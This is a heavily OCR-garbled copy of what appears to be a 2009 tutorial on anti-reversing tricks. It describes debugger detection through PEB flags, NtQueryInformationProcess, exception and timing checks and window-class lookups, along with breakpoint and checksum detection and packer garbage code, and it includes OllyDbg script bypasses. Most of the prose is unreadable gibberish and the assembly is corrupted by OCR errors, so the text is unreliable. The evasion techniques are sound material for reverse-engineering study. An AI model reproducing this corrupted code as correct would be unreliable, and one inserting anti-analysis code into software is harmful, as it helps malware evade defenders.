aio jalar ¿e sh e op, Sañyaz, d Wzuaze só Juado a 


Gaonír, st, 0 ea oda) aya das y Anti reversing tricks 
Miiya y j e do 
da) 0d Anti reversing-=2 9% 9 do: dd EEE id ye e Sid ¿$22 UnpackingAnti 
abri izogle seo dues do Jiee ego ¿asc ce oca gta, 
da ¿otyado* bo paa vai" Jue pacón pario 


HROOÓ ua, 


Eo ¿oa Gago abcón ya, 


ME s as MS 
id at y 1 ud al q 


cea 
. DEBUGGERDETECTION ¿Iubi idas y)1 
. BREAKPOINT AND PATCHING DETECTION ¿229148 29 00 og alias Ys ¡dira y )2 
3 m0 hd dla, so 2020 ANTRANALISS 
. ADVANCED AND OTHER TECHNIQUES gasa ¿5 35020 5 )4 


all ly 00 q Jado lUlo pat 2009 


Ivi sd leg as vato Ives aso: ATARE iclvedonz 


DEBUGGERDETECTION ¿dió l iy otes 2 


lua: ya: Jez Aris GUY de ¿aajyalt jasa ¡3 Process qa ya Abe Té JE cala de 
ye E Ed IJO jánal df abs Sl ¿9 E yasj £jadiayado ed e Mode Kernel - Fi as Sl 


Hija BeingDebugged flag=>é — ¿*% JU ¿ula boe ¿dog ¿la dl abi plz y E 8 
y 
de 


As go só e 2 Kermel32 bg jtaós 


gábraja $0 génye Process Environment Block (PEB) 223 
spa 2có Process leyó Ócide va BeingDebugged dista del jues ide ¿dls X) lsDebuggerPresent 
£Jl? 3user-mode debuggerue%) 


PEB.BeingDebugged flag Gis*Qá — jj5ód yo IsDebuggerPresent yerég ¿dd já da dl sa 
plo jo habs: 


¿Call kernel32!IsDebuggerPresent () 


Call [IsDebuggerPresent] 
LESt eax, eax 
jnz .debugger_found 


¿check PEB.BeingDebugged directly 
mov eax,dword [fs:0x30] 


TEB.ProcessEnvironmentBlock 


mOVZX eax,byte [eax+0x02] ¡AL = PEB.BeingDebugged 
test eaX, eax 
HE .debugger found 


ua das do Y y al 0% 
eS dd y Lot, ¿ob lla, 


als, Poole a Gu td Des ¿uaalja Ely 


degaalá pe E ia ¿QflagPEB.BeingDebugged=50 sIJMIi¿0aya 
fs:[30] 35 du Ctrl + G VÍ ¿ón Datasé 3 4 0Ó0% OllyDbg + cy PEB.BeingDebugged flag- 
5 ayas dy dor alle 2 Odbgscript ds dbh ¿Os? amo ¿bya, 


ai ls Uca lps 2009 (257 == 


lab lus ad loe gasz: ATARE JA ud) ú yude de 6 loved 


ET ¿ye usó OllyDbg Es ZE6O dd COS Solá ) dd 004 as Hua Advanced OllyDbg 
BeingDebugged field-2¿ ur 0 820 1 jiedó 3 


E 


Debug Bits 

ÍV' IsDebuggerPresent 
 NtGlobalFlag (not recommended] 
T HeapFlags 

 ForceFlags 


IsDebuggerPresentPlugin 9 3uarbs ¿oa ób yasóla Plugins 9003 + dla 5 


Ja Ú t ya 
NtGlobalFlag 53230 22007 h sa ¿a Process babas dd sud iia 70 ed yo ja paja 


E 


FLG_HEAP_ENABLE_TAIL_CHECK  (0x10) 
FLG_HEAP_ENABLE_FREE_CHECK  (0x20) 
FLG_HEAP_VALIDATE_PARAMETERS  (0x40) 


a 


9 Justuye+ Flags Heap 33 300041 ¿20d ya NtGlobalFlagáy oz ds Za 0 al 
jedi? Bs PEB.ProcessHeap ¿y  heaps=33ck ¿obdely UN sJjesaa  Heap Flags ¿> 


Alles, ile ¿ón ¿93713 50000062 reta 2140000060 ¿ye O 
dog IE as ips ¿e Heap ua +4 0: 


HEAP_TAIL_CHECKING_ENABLED  (0x20( 
HEAP_FREE_CHECKING_ENABLED  (0x40( 


all ly 0 ao lll 2009 


lab lus ad loe gasz: ATARE 


e 


a ay ul dao lll 


loe 


LAA 


Cubs y: 


¿aya zo PEB.NtGlobalFlag + 


* PEB.ProcessHeap==é cs 2d), 330043 


PEB 
ebx, [fs:0x30] 


¿ebx 
mov 


l= 


¿Check if Pl 0 


EB.NtGlobalFlag 


cmp dword [ebx+0x68],0 
jne .debugger found 
¡¿eax = PEB.ProcessHeap 
mov eax, [ebx+0x18] 


¡Check PEB.ProcessHeap.Flags 
cmp dword [eax+0x0c],2 
jne .debugger_found 


¿Check PEB.ProcessHeap.ForceFlags 
cmp dword [eax+0x10],0 
jne .debugger found 


PEB.NtGlobalFlag ¿+ ¿2 0 PEO a 
dz AO gba ja: ¿ión ENEE de + OdbgScript 


% súbo iljoj ¿dz PEB.HeapProcess=3 


var peb 
var patch addr 
var process heap 


0x7ffde000) 


//retrieve PEB via a hardcoded TEB address (first thread: 


mov peb, [Tf£ffde000+30] 


//patch PEB.NtGlobalFlag 
lea patch_addr, [peb+68] 
mov [patch_addr],0 


//patch PEB.ProcessHeap.Flags/ForceFlags 


mov process heap, [peb+18] 

lea patch_addr, [process _heap+0c] 
mov [patch_addr],2 

lea patch_addr, [process _heap+10] 
mov [patch_addr],0 


35112661248 OllyAdvanced 


ld logs a les oagz: ATARE lares t 


Debug Bits 
TT IsDebuagerPresent 

[Y NtGlobalFlag (not recommended] 
[Y HeapFlags 

 ForceFlags 


51 ye + Poison 


— Ant-Debugger 
T” Aggressive PEB Hide 

T IsDebuagerPresent 

[Y NiGlobalFlag 

[4 Heap Flag 

TF CheckRemoteDebuggerPresent 


¿ oa Ñ ñ Ñ . Ñ O Y EN 4 
EEES 305 ya Lia yaya Kermel32  CheckRemoteDebuggerPresent yapa 03h galas sob 


Ea dd dos coto de eo Je ss gee 390 370 NtQueryInformationProcess ¿gua 


ib. $9  £2  ProcessinformationClass parameter 35 Dd Moe $3 ntdil ¿> 
no. En , 5 e es n , La ” 
¿umpoyestóg a lbs  DebugPortck gai l 33 ProcessDebugPort (7) 
e ind 
: CheckRemoteDebuggerPresent yaa; ¿00 203 
orar isa UguáljeTre $e Jóged ds a 0 JS as ul. Boolean 9 dis 


bi 


BOOL CheckRemoteDebuggerPresent ( 
HANDLEhProcess, 

PBOOL pbDebuggerPresent 

); 


eS JÁROO yO chs NtQueryInformationProcess vezz9? 33 


NTSTATUS NTAPI NtQueryinformationProcess( 


abi 0 U cada do lla pat 2009 


ld lees aa Ives oagz: ATARE loirlucdors e 


HANDLE ProcessHandle, 
PROCESSINFOCLASS ProcessinformationClass, 
PVOID Processinformation, 

ULONG ProcessinformationLength, 


PULONG ReturnLength 
); 


alba Pa A rol $ be, 
¿hina Ogdirórión cis jo Hb : 


.data 
krn1 db "kernel132.d11",0h 
chkrdbg db "CheckRemoteDebuggerPresent",0h 


«data? 
IsItPresent dd ? 


. code 
PUSH offset krnl ¡¿kernel32.d11 
CALL LoadLibrary 


¿CheckRemoteDebuggerPresent 
PUSH offset chkrdbg 

PUSH EAX 

CALL GetProcAddress 


¿IsItPresent variable will store the resault 
PUSH offset IslItPresent 

PreR -=1 

CALL EAX 

MOV EAX,DWORD PTR[IsItPresent] 

TEST EAX,EAX 

jne DebuggerFound 


¿ Using ntdl1!NtQueryInformationProcess (ProcessDebugPort) 
lea eax, [ .dwReturnLen] 


push eax ¡ReturnLength 

push 4 ¡ProcessInformationLength 
lea eax, [.dwDebugPort] 

push eax ¿ProcessInformation 

push ProcessDebugPort ¿ProcessInformationClass (7) 
push OXffffffff ¿ProcessHandle 

sala [NtQueryInformationProcess] 

cmp dword [.dwDebugPort],0 

jne .debugger_found 

ayy 0 U cada ll pal 2009 


lab lus ad loe gasz: ATARE 


vedat? 500 lr só OdbgScript-22)2x5% E 
var bp _NtQueryInformationProcess 


// set a breakpoint handler 


eob bp_handler NtQueryInformationProcess 

// set a breakpoint where NtQueryInformationProcess returns 
gpa "NtQueryInformationProcess", "ntdl1.dl1" 

find SRESULT, +$C21400+ //retn 14 

mov bp _NtQueryInformationProcess, $RESULT 

bphws bp _NtQueryInformationProcess,"x" 

run 


bp _handler NtQueryInformationProcess: 


//ProcessInformationClass == ProcessDebugPort? 
cmp [esp+8], 7 
jne bp _handler NtQueryInformationProcess continue 


//patch ProcessInformation to 0 
mov patch _addr, [esp+tc] 
mov [patch_addr], 0 


//clear breakpoint 
bphwc bp _NtQueryInformationProcess 


bp _handler NtQueryInformationProcess continue: 
run 


desig or yeza OllyAdvanced ¿si 


[Y CheckRemoteDebuggerPresent Ts | 
¡1 ZwSetinformationThread 5 | 
TT ZwQuerySysteminformation 

[Y ZwQueryinformationProcess 

TT ZwQueryObject 


CA 


[Y CheckRemoteDebuggerPresent 
 DutputDebugStringá, 

TT Findw*indow 

FT ZwSetnformationThread 

[Y ZwQuerinformationProcess 

TT DebugBreak 


all Bu ls ud de Ado ¡pat 2009 


gia: 


laredo e 


tao de y a Blas ¿ua NtQueryInformationProcess + ¿asdal ye ua dl e DA 


302*. y ProcessInformation-22 yaris 


dal y pagará yal 


Qidya ¿+-Poison ZESO dd iS ¿bé ya a 


lab lees ad loe gasz: ATARE laredo e 


soe 22 INT1 breakpoint ¿ada INT3 Interrupt-32 gas *bh aia bt 1ó Ll 


JA 


: 


1 


ab de Ep ón ¿q handlerexception y 3d bag ias 
Só acó o 0 y exception handler-¿ zi flags mas 


Lo BNO od exceptions single-step - ) veská 
y tó Lat fal 6 
flag *¿L* ¿saya ¿INT ¿dal nterruptez 0% 59é2-process Sez Li 5ócipo JSz0O ya sólo q 


ao) de RRRFFFF accio a ecc EAX go 52 handler exception ¿ala y ¿a 
handler Sal¿0p ds, 


exception 


¿set exception handler 


push .exception handler 
push dword [fs:0] 
mov [fs:01, esp 


¿reset flag (EAX) invoke int3 
xor eax, eax 
ES 


¿restore exception handler 


pop dword [fs:0] 

add esp, 4 

¿check if the flag had been set 
test eaXx, eax 

je .debugger_found 


.exception handler: 
¡EAX = ContextRecord 


mov eax, [esp+0xc] 

¿set flag (ContextRecord.EAX) 

mov dword [eax+0xb0],Oxffffffff 
¿set ContextRecord.EIP 

ina dword [eax+0xb8] 

xor eax, eax 

retn 


¿aja Agur 


all ly 0 zado lll 2009 


lab lunas ad loe gasz: ATARE lodrlve dose 


o Exceptions3óg 2 Cu DebuggingOptionsióg 933 ia ds q go cua OllyDbg 


7 ¿brad iii: 


== Debugging options 


Commands | Disasm | CPU | Registers | Stack | Ana 
Security | Debug | Events  Exceptions | Trace | 


VW lgnore memory access violations in KERNEL32 


e [pass to program) following exceptiors: 


ae dód qe eaeydes CPU Eicus jee dee F8 jura did adri Process q*sya 
GOL ys ¿oProcess ¿as ¿ro rr rl ig oydescrU 
y ió, glogló Jr qó ¿yaya 004 


ondas $0 390 UA moya ¿ee 


y 


A pea E ed, juLy TÚ de 0d ess , 


ya yoo ¿Process Lts dls sv, 


alo ds a Ji o ja RDTSC 322 Counter Time-Stamp Read ¿y 9 3* 11 


Ea 


Ajo SI de ) ¿aya JO Lew delta Es jan yaya ¿dl 


¿2 ROTSC li ga e y jamas ás lol ji ¿o a, 


rdtsc 

mov ecx, eax 

mov ebx, edx 

Fases moje imstructions 
nop 

push eax 

pop eax 

nop 


as MOS Instructions 
¿compute delta between RDTSC instructions 
rdtsc 


¿Check high order bits 
cmp edx, ebx 
ja .debugger found 


28 23 080 dado lbs 2009 


A 


lab lees ad loe gasz: ATARE 


¿Check low order bits 


sub eaX, ecx 
cmp eax, 0x200 
ja .debugger found 


abajo 


¿ho a etTidkCount a 3* ye baaa ¿a kermel32 lla 


IR 


piñas sz $ y ás Js Abi zu Ñige timing checks ¿2 Y ZU ¿ets a 
ya ) o 


de 


GetTickCount $3 sell y Las CEA 


¿Móra ¿2 OllyAdvanced ¿23 zoo ¿Jo cop biie ua cede es 'driver mode kernel 


a ón Ue cos aa BSOD 306 


tala ls 


Y GetTickCount Ts 
(+ No Counter (0) € Counter+1 


—Anti-RDTSC [Driver-based]- 
[Y Enable 
Eo Method 1 (> Method 2 


al auna ¿2 Poisonam el y ay yo EST É 


 OpenProcess 

[Y GetTickCount Hook 
TT InvalidHandle 

IT ZwYieldExecution 


23 zos dy as qodU ¿7 SeDebugPrivilege e sa ei 


jóla “zua 3 Es Process L* pa Jl Qe ; 
a qé 30 WinDbg ¿2 OllyDbg-==2 *% User Mode Debugger 3 =*JJ> Process-=é ES 


y 
SeDebugPrivlege Ly 2áya, su dog jligó cuajo Cog ágoija jo jaól yo ¿2 SeDebugPrivilege 


2009 


A TIN 


A AS SN TS 


A me ¿Process lc yicsRSS.EXE ¿ alot g dl dos ¿a CSRSS.EXE 
sE Li a Id ¿vi 3 *, EV) ce Process ab:; do EA CAS ce 


a 


SeDebugPrivilege "2ya da 0% $ 


c2 ¿Óm process Bb Y OT jeep af lios CSRSS.EXE 3£00 Process ¿4 Mgo do 07000 


: S ó 
. SeDebugPrivilege 
A pl és « o as E de Pl , í , oa El A 
Ed ntdll vaz CsrGetProcessld vag zz e.) de gl hy Eon Haig de 


alDverór? dos rara Ei 


ID Process QÍCSRSS. EXE Eso cun e x SÓ ¿uan ya Ke 


22 EZ pue OpenProcess 32 dad Ediueda o * 2072 SeDebugPrivilege "Syaj ct 39 
¿Process Eo 


[a] 


PSuSio) EONE as ID) Gi Cassina 


call [CsrGetProcessld] 

FULy O open the CSRS9/. EXE Process 
push eax 

push FALSE 

push PROCESS QUERY INFORMATION 
call [OpenProcess] 


¡E TOpenBrocess () weas suecessul, 
¿process is probably being debugged 


test eax, eax 

je .debugger_ found 

$ 8 e ba Sa ES A Y MES A L E: 
¿deve NtOpenProcess sl y 9; ¿year $202 EAX 255600 0000022 delicia y y ¡yaligól os 


Je Process-2¿ de ueóáo 03 Y STATUS_ACCESS_DENIED+*B0 34 


He eo Parent JO Process bb A tutos 5 explorer. exe pa Ja caja US 


00 ¿ae year Parent» aL; e ¡occ ¡E 


ay ita ica, 


all ly 0 O zado lll 2009 


ll le aioz llega: ATARE A ud) Det de 6 do lvEdossz 


oye dea bpm: 
E CO 
ya ya 
.GetCurrentProcessldyaz¿ 9? dl str iódag 35TEB.Clientld 
ad 18 0 E Processes ¿20h da so ji ¿Process32First/Nextaiól és o] 
parent eu ¿ug «uf PROCESSENTRY32.szExeFile 5%”0» explorer.exe y PID 
.PROCESSENTRY32.th32ParentProcessID ye?) m3) ue 


hsblJ + fexplorer.exeÍy  PID==%2 1J parent process 
Louaj 


; ca 7 á e E 4? 
Losa o y ts ici, 


R 


cesar baza OllyAdvanced 7 ¿Lácara ¿Pas dc Process32Next21U 


4 +7 EA Re ¿ $ 
Jun yo do qaajast ue qe PID: 


3300 XOR EAX, EAX kerne132tProcess32NeH tl 
TCe63B61 [2 RETN 8 
7C863B64| B3EC BC ¡SUB ESP,BC 


T UnhandledE xceptionFilter 1 1éS 
[Y Process32Next Ts 
 Module32Next Ts 


l” CheckRemoteDebuagerPresent Ts 


3er Poison ze. At 
¡ Module32Next 


[Y Process32Next [7 Hook! 
FP Enumwindows | 


all ly 0 ao lll 2009 


lab lees ad loe gasz: ATARE JA ud) a yd: de 6 lodcloedors e 


Jlég q es ad dba Process dez sica deco dudo e Uy oo rat jes Ayiga 


gn ta least o orProcess* 
objects kernel 432 ,/, DebugObject Usd rs debida y 0 pels Doors FED ty é gia 
. DebugObjectz0£kernel Asbó? Cy object 
Cudr da) 5 Er ob ye re 06 yntdll veviz ds NtQueryObjectuezi Ge 36 DebugObject¿ gr uetggej 3 
ObjectInformationClass-¿ ¿NULL- )ObjectHandle=27 * > >24ó objectstypes-2? Enya uds 
. ObjectAllTypelnformation 


NTSTATUSNTAPINtQueryObject( 
HANDLE ObjectHandle, 
OBJECT_INFORMATION_CLASS ObjectinformationClass, 
PVOID Objectinformation, 

' ULONG Length, 

| PULONG ResultLength 


E 


2 060 ví zES dee 30 OBJECT_ALL_ INFORMATION JE Alfio ime Ji Ae ia SOS 
o o $ yA 


Number0fObjectsTypes 


typedef struct OBJECT ALL INFORMATION ( 
ULONG NumberOfObjectsTypes; 
OBJECT TYPE INFORMATION ObjectTypelInformation[1]; 


) 


30142 ObjectTypelnformation (4 yo liggaso ¿seda : 


typedef struct OBJECT TYPE INFORMATION ( 
/*[00]*/ UNICODE STRING TypeName; 
/*[08]*/ ULONG TotalNumberOfHandles; 
/*[0C]*/ ULONG TotalNumberofobjects; 
//... more fields ... 

) 


Gó* 3 y DebugObject“s ¿ua Sisa ¿00 UNICODEstring==é 3 TypeNamedi*Gá ga sli có * 


¿e ob dl ved TotalNumberOfHandles +5 TotalNumberOfObjects Sis*Gá ya ss ¿có 


a y el dao lll 2009 


laredo e 


Md ester 


lab lees ad loe gasz: ATARE 


NtQueryInformationProcess -¿¿ ál gas? rl 


3 NtQueryObject-=2  Bó jon ue gd 
pe 
E" 'isáóval 


3010 yós sad OdbgScript ¿37 004 álaaya, 


és dí NumberOfbjectsTypes Ó%5*2¿ Ó0u5d9  OBJECT_ALL_INFORMATION-<E vapód ¿Ub 


33 ón yate OllyAdvanced zEs E gia E NtQueryObject : 


TT ZwQuernyinformationProcess 
[Y ZwQueryObject 

T TerminateProcess Ts 
TT Scramble Export Table 


a ye da Poisonzesó Sebs: 
IT Module32Next 
ITA Process32Next 
¡O Enumwindows 
| [Y ZwQueryDbject 


TF Hook 


0d us god ol oro 


O O STE: Pob ¿odó 
¿ z= 3 )WinDbgFrameClass for WinDbg  ,OLLYDBGfor OllyDbg(áGz e gás de 5 yadhí 


sel e 
Msg q ár ya User32 39 ¿20Que FindWindowEx 3h ggguisó iio Ala yo Geoua FindWindow 
$ ga 


2009 


A TIN 


ld logs aa les oagz: ATARE lares t 


de lr ouaFindWindow AS ooo h0ze OllyDbg 3922 WinDbg *adz39,42 32 101 


.data? 

.szWindowClass0llyDbg db "OLLYDBG",0 
.szWindowClassWinDbg db "WinDbgFrameClass",0 
. code 

push NULL 

push .szWindowClass0l11lyDbg 

cell [FindWindowA] 

test eax, eax 

jnz .debugger_found 

push NULL 

push .szWindowClassWinDbg 

call [FindWindowA] 

test eax, eax 

TZ .debugger_found 


ba de «hi FindWindowEx FindWindow ie $ 44 $ 3) Y La ips 
s By 3 ya y 


PU a SEA e e lud óseo 3 lpClassName string parameter 


: OllyAdvanced-3¿uas 2, 93 


TT TerminateProcess ES 
 Scramble Export Table 
[Y Findw'indow 


: poison- E yaa 35 
¡A DutputDebugStringá, 


¡[Y Findw'indow 


| TT ZwSetinformationT hread 
TT ZwQuerpinformationProcess 


sarmueza Phantomas ¿Use 9 ¿0OllyDbg : 


a y e dao lll 2009 


lab lees ad loe gasz: ATARE A ud) y) dl de $ RA TAS 


- load driver 
- hide OllyDbg windows 


- hook NtSetContextThread 
- hook RDTSC 


CACAO] 


lo ya: 3 era abr ll jo aria Je jes caja 


eg. (3% ábya jjiyat  Processes-¿¿ say ido ji qu bl Processes->¿ £ ¿5 Jo 
image name %e> Process32First/Next vez¿Q 34% Quó ¿23 ).OLLYDBG.EXE, windbg.exe, etc 


EY ÓN Ed 


ay abcuava ¿ree? ¿ue 0 O RVÓ ys 
ete rd ise "OLLYDBG Ligas ¿ 
pl Y ¿a aby o a 8d (Cd ¿a CU) ya 


pe Sd ¿ce Read rocessMIEmo As yo 


lo sd 3 áza al? : + exe qa Jos 


e ue ¿aia Process32NextW hy do ¿jartsio  parentprocess check-=¿ 4 at T, 


. Processes 


vab* jaa? dy ds Debugger Mode Kernel ¿tó ide 210 siria ro 


Kernel : 
Debugger Mode pa e soficE 006 aja ja ¿must ya LS Lt Ed e ya dl yo ds 
axel pil go jebir oa CreateFile 


push NULL 


abi 0 U cada do lll 2009 Ga == 


laredo e 


push 0 

push OPEN_EXISTING 

push NULL 

push FILE SHARE READ 

push GENERIC READ 

push .szDeviceNameNtic 

call [CreateFileA] 

cmp eaX, INVALID HANDLE VALUE 
jne .debugger_found 


.szDeviceNameNtic db "AN.ANTICE",O 


B son dy dee 44 . a A . í a ZO lt hoy . a La 
o do a Device driver detection ¿2 Le bue pág ja a y a 
2 ya 


. Regmon and Filemon 


VAR ¿e 33 FileName parameter -2 4 yaris kernel32!CreateFileFileW ved íss lsh add) e 3 
2sINVALID_HANDLE VALUES Feb SÓ zanjas as aÍóalO sESAS. 


Breakpoint memory-%> acess/write +OllyDbg ya9i Shell OllyDbg 14 ya0a vado go 


2 ¿o pages guard 9Juidat vetar pages guard Ao JO ES giga gua 
PAGE_GUARD page protection ¿+= jue Guard pages-22 39 $ Aso, access »pÓ 260 


¿25.4 ¿G breakpoint 


CN oz guard page ezo Y EN ab teo e) $2 modifier 
$ 
. STATUS_GUARD_PAGE_VIOLATION (0x80000001) 


poa rua e cab Process E" ÓSEO yg ación o dad ss pageguard 


. memorybreakpointó 332,226 accessayoi 2001 ósexception 5 


aby Uca ll pal 2009 7 H—— 


ld logs aa les oagz: ATARE lares t 


(e 40ya En ago y ¿Ué 23 y jujya y dz Y -£ A 


, 


PAGE GUARD Só Ss? Els 


noe . Pos a 
¿di 99d 00% ¿ás qa zo 


; set up exception handler 


push .exception handler 
push dword [fs:0] 
mov [fs:01, esp 


; allocate memory 
push PAGE_READWRITE 
push MEM_COMMIT 
push 0x1000 

push NULL 


call [VirtualAlloc] 

LSSE eax, eax 

JE «failed 

mov [.pAllocatedMem] ,eax 


; store a RETN on the allocated memory 
mov byte [eax],0xC3 


; then set the PAGE GUARD attribute of the allocated memory 


lea eax, [.dwOldProtect] 

push eax 

push PAGE EXECUTE_ READ | PAGE GUARD 
push 0x1000 

push dword [.pAllocatedMem] 

call [VirtualProtect] 


¿; set marker (EAX) as 0 


xor eax, eax 
; trigger a STATUS GUARD PAGE VIOLATION exception 
Call [.pAllocatedMenm] 


¿ Check if marker had not been changed (exception handler not called) 
test eax, eax 
je .debugger_found 


.exception handler 

¡EAX = CONTEXT record 

mov eax, [esp+0xc] 

¿set marker (CONTEXT.EAX) to Oxffffffff 

; to signal that the exception handler was called 


mov dword [eax+0xb0],Oxffffffff 
xor eax, eax 
retn 


abi 0 U cada do lll 2009 73 th 


lab lus ad loe gasz: ATARE 2d El dd” $ lodcloe lors z 


Breakpointg Patching Detection ólas) YE Soy igló la y oler 3 


O O 
Interrupt Breakpoint /INT3 30 ¿queóbcc jedi, y) ya Liso Já ¿aaa jr e hue es 3 


y A API y 4 de Ja, 


cld 

mov  edi,Protected_Code_Start 

mov  ecx,Protected_Code_End-Protected_Code_Start 
mov  al,Oxcc 

repne scasb 

jz  .breakpoint_found 


A E 


if(byte XOR e ) then breakpoint found 


// Where: 0x99 == OxCC XOR 0x55 


' pai breakpoints hardware. 


e . eo Pb LIS 
OS TS 


ES hardware breakpoint-=+ + 3205. hardware breakpoint-2¿ 5% lima Yás logs ds 
E debug registers-¿2 w2lás 


36 ¿Le a Dr3 » Dr04, DA 3 26 ¿Le a 
Dr0 


Dr6-2¿x5.1 1 4.5Ó hardware breakpointáa is 5 45 OllyDbg: VJ JS rá digb Ya 4 ó 905) 


ai ls Uca lps 2009 ara) 


lab lus ad loe gasz: ATARE 


laredo e 


Ars Ja lll at TA 0 rá acacia enabling/disabling 

aga rara 901 30 qe za dog agó e read/write * 
TT 5H 2% hardware breakpoints limá Y3> Y ypión 
¿o je feo pal o A e User Mode 3¿2 Ring3 ¿2 wx* ¿¿m Ju registers 


ya 


ya 


42 ¿04 ¿có CONTEXT structure 3; debug registers-+ ¿04 2» ÓsEz 4 O 3 CONTEXT structure 


2 


. exception handler-22 » ó%8£2 ContextRecord gz0£3 Cr 


: debugregisters-e ús ya gó as 


; set up exception handler 


push 
push 
mov 


.exception handler 
dword [fs:0] 
[fs:0]1, esp 


¡¿eax will be Oxffffffff if hardware breakpoints are identified 


xor 


eax, eax 


; throw an exception 


mov 


dword [eax],0 


; restore exception handler 


pop dword [fs:0] 

add esp,4 

; test 1f EAX was updated (breakpoint identified) 
CESE eax, eax 

JUE .breakpoint_found 

.exception handler 

¡¿EAX = CONTEXT record 

mov eax, [esp+0xc] 


¿check if Debug Registers Context.Dr0-Dr3 is not zero 


cmp 
jne 


dword [eax+0x04],0 
«hardware bp found 
dword  [eax+0x08],0 
«hardware bp found 
dword [eax+0x0c],0 
«hardware bp found 
dword  [eax+0x10],0 
«hardware bp found 
.exception_ ret 


«hardware bp found 


Set 
mov 


A TIN 


Context.EAX to signal breakpoint found 
dword [eax+0xb0], ,Oxffffffff 


A 


lab lus ad loe gasz: ATARE 


¿exception ret 
¿set Context.ELlP- upon Teturn 


add dword [eax+0xb8],6 

xor eax, eax 

retn 

dos 4 ¿hice o ¿sy keys decryption IS dógE JO zds $ JoSals ¿ace ¿a registers debug 


TEGO de 03 gl 
do 


oblea ¿asia in je To ella presas ana 
Ilya poa rango 


á eS a s] 1% 4 , a t Lar 
39 ye 00 2220 breakpoints software 007 y god dad ¿at JO srrds Zara pag, 49%) jar 
A ES Por. L Ñ a . 
So go rra OllyDbg Y 3yaccess/write memorybreakpoint-=2 
Breakpoint Toggle F2 | 
Hit trace »|  Conditiomal Shift+F2 
Run trace »'  Conditional log Shift+F4 
Run to selection F4 
Follow Enter 
New origin here Ctri+Gray * Memory, 1 
Goto » Memory, on write 
Follow in Dump » ; 
ES Chrl+k Hardware, on execution 
30 sg API ocoiyallzózos)  nativeAPls-¿ 3% 7 softwarebreakpoint +» 30% 35 
ya 


e “al Dd ¿oó dais 2 -CRC32 X CG E 


a pta pod Era pd lg 00, ABU Eg ¿ui e ao E ala 3400 
A A E dd 3 poa 


s2¿zanti-debuggingáh iv jo 9d a, 


288 2/3 090 dado lbs 2009 


laredo e 


mov esi,Protected Code Start 
mov ecx, Protected Code End Protected Code Start 
xor eax, eax 


.Cchecksum_ loop 


MOVZX ebx,byte [esi] 

add eax, ebx 

rol eax,1l 

LAS esi 

loop .checksum_loop 
cmp eax,dword [.dwCorrectChecksum] 
jne .patch found 


A ¿9 óp hb . q. * 4d. A 
Go? yr checksum code 104 AY só sá 2 breakpoints hardware 
: a ; o . A ICI ¿A : As e 7 
2 y Ogg ue yal io y Gas o am code checksum ¿2 2 y Y y 


, 
19 


routine checksum s5*33gx 7 ¿ ya rá za checksum se £% j03gós ¿dls a ya ¿e Kanal 


¿HCD ésqa30)95PEID ¿aji 


EA 
2 bl elo) 134 


A 


. “of El dd Ek Pe o ho e o p 
¿boialyy lijar eres ja iaa y aia 3 disassembler aya 


¿jyesdaroó jajaa a be jo ja ¿al ya 


ai ls Uca lps 2009 77 === 


la lunas ad loe gasz: ATARE Wwe EdVnsz 


ET A E 
E ya ya 


a od á ne 
encryption db Eye 37 
y 5 


Eu a ¿varía ye de rl so gg ol yaaa XOR 33 V020 Ar dle sé li algorithm 
de bncó JO ¿q 


5 9 PE¡ID ES CO de Ap E Jus d ay qe Siya cua ya 36 
. FastScanner 


PE A UA 
bo EE óg el Gézoya Y E 3 > 


0040A07C LODS DWORD PTR DS: [ES1I] 
0040A07D XOR EAX,EBX 

0040A07F SUB EAX,12338CC3 
0040A084 ROL EAX,10 

0040A087 XOR EAX, 799F82DO0 
0040A08C  STOS DWORD PTR ES: [EDI] 
0040A08D INC EBX 


0040A08E  LOOPD SHORT 0040A07C ¡decryption loop 


aba NOR : 


00476056 MOV BH,BYTE PTR DS: [EAX] 
00476058 INC ESI 
00476059 ADD BH,O0BD 
0047605C XOR BH,CL 
0047605E INC ESI 
0047605F DEC EDX 
00476060 MOV BYTE PTR DS: [EAX],BH 
00476062 CLC 
00476063 SHL EDI,CL 
More garbage code 
00476079 INC EDX 
0047607A DEC EDX 
0047607B DEC EAX 
0047607C  JMP SHORT 00476078 
0047607E DEC ECX 
0047607F JNZ 00476056 ¿decryption loop 


el 


¿y iaa ja yo ás da Ja ao ] ¿0 aar 


a 


v 


qa ra ao ír dolió Ajo a A sa AuaData pá jaja oa Y 
def 9 LZMA-2¿s NRV (Not Really Vanished) ¿2 aus juas de io head 


ld yo cie day aPLib-Jé vasc 99 UPX=E 2 0 Jo cis Ly )Lempel-Ziv-Markov chain-Algorithm( 


al ly 0 zado lll 2009 


luis leg as ito Ives aso: ATARE 


laredo e 


yoda's je soez 120 é sót0aUe Upack=ge do oras LZMAS E soóoae ESG E 


de nn e * “. IS TES AAA A air tas 
¿ias ¿Lo ya qua aye Garbage ya gas 370 ds, ale boy JO Js losa? ty HU 


0044A21A 
0044A21C 
0044A223 
0044A225 
0044A228 
0044A22D 
0044A233 
0044A239 
0044A23F 
0044A245 
0044A24B 
0044A24D 
0044A252 
0044A254 
0044A25B 
0044A25C 
0044A262 
0044A268 
0044A26B 
0044A271 
0044A272 
0044A277 
0044A278 


¿dol 


ábioiaas gdl aria QLt; diga q ás 


. Protector 


Gásly jitlY caja ¿gta ay daa ASTI 


; A ico 
pg go Js dia 


el 


¿ócico, e 3 ¿a codegarbage irc ya yor lila as 


hs z 
GS ?PQSÓ Sa UU 
E 


s 


JMP SHORT sample.0044A21F 

XOR DWORD PTR SS: [EBP],62E4858D 
INT 23 

MOV ESI,DWORD PTR SS: [ESP 

MOV EBX, 2C322FFO 

EA EAX, DWORD PTR SS: [EBP+6£E5B321] 
EA ECX, DWORD PTR DS: [ESI+543D583E] 
ADD EBP,742C0F15 

ADD DWORD PTR DS: [ESI],3CB3AA25 
XOR EDI, 7DAC77F3 

CMP EAX, ECX 

MOV EAX, 5ACAC514 

JMP SHORT sample.0044A257 

XOR DWORD PTR SS: [EBP],AAE47425 
PUSH ES 

ADD EBP, 5BAC5C22 

ADC ECX, 3D71198C 

SUB ESI,-4 

ADC ECX,3795A210 

DEC EDI 

MOV EAX,2F57113F 

PUSH ECX 

POP ECX 


8 ay ul dao lll 


prz 


pija ¿e code garbage 9 dos yo 
js y 0 SÓ peo, 


422 code garbage Ju ¿Jo ¿o loyac illes : 


lab lus ad loe gasz: ATARE 


0044A279 EA 


0044A27F DEC 


EDI 


0044A280  XOR 


0044A286 EA 


0044A28C DEC 
0044A28D SUB 
0044A293 MOV 
0044A298 MOV 
0044A29D MOV 
0044A2A2 ADD 
0044A2A4 MOV 
0044A2A9 MOV 
0044A2AE  CMP 
0044A2B0  NOI 


0044A225 MOV 
0044A23F ADD 
0044A268 SUB 
